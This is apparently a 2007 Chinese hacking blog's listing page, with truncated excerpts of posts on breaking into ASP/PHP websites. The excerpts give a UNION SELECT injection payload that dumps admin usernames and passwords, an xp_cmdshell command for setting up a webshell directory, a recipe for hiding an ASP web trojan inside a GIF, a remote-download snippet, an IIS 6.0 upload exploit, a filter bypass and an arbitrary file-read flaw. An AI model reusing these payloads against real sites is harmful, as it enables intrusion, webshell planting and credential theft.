2007年6月11日
摘要: http://www.xssed.com/archive/special=1/ 阅读全文
posted @ 2007-06-11 16:46 %5C 阅读(626) 评论(0) 推荐(0) 编辑
摘要: 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'建立虚拟目录win,... 阅读全文
posted @ 2007-06-11 16:44 %5C 阅读(251) 评论(0) 推荐(0) 编辑
摘要: JUST,DO.IT!I LOVE HACKED DOWN WEBSITE. This is BUG Only For > IIS 6.0 (Windows 2003 ) EXPLIOT: HTTP://WWW.****.COM/(UPLOAD.ASP) You can change upload is filepath…. -_-!! (exmple:upload/*.gif) changed... 阅读全文
posted @ 2007-06-11 16:43 %5C 阅读(242) 评论(0) 推荐(0) 编辑
摘要: 1.一句话 2.图片后门copy *.gif /b + 网马.asp /a Google.gif然后建个ASP文件 !–#include file=”Google.jpg”–注意路径 3.Microsoft.XMLHTTP下载Set xPost = CreateObject("Microsoft.XMLHTTP")xPost.Open "GET","http://xxx/*.txt",F... 阅读全文
posted @ 2007-06-11 16:42 %5C 阅读(228) 评论(0) 推荐(0) 编辑
摘要: + News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2后台“图文管理”里添加文章... 阅读全文
posted @ 2007-06-11 16:41 %5C 阅读(617) 评论(0) 推荐(0) 编辑
摘要: 原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa突破的前提条件是 : 服务器是win2003 全功能的空间**************************************************'函数名:UserNamefilter('作 用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)'*************... 阅读全文
posted @ 2007-06-11 16:38 %5C 阅读(2628) 评论(0) 推荐(0) 编辑
摘要: showpic.php str=$_SERVER['QUERY_STRING'];$img=base64_decode($str);$codelen=strlen($safeguard);//获取附加码长度$img=substr($img,$codelen); //去掉附加码readfile($img);提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后... 阅读全文
posted @ 2007-06-11 16:37 %5C 阅读(346) 评论(0) 推荐(0) 编辑
摘要: 受影响系统:新云网站管理系统最新版发现人的BLOG:http://sobiny.cn发现日期:2006年10月中旬发布日期:2007年6月上旬安全综述:新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。漏洞描述:先看const.asp的GetUserTodayInfo过程。QUOTE:Lastlogin = Request.Cookies("newas... 阅读全文
posted @ 2007-06-11 16:35 %5C 阅读(1940) 评论(0) 推荐(0) 编辑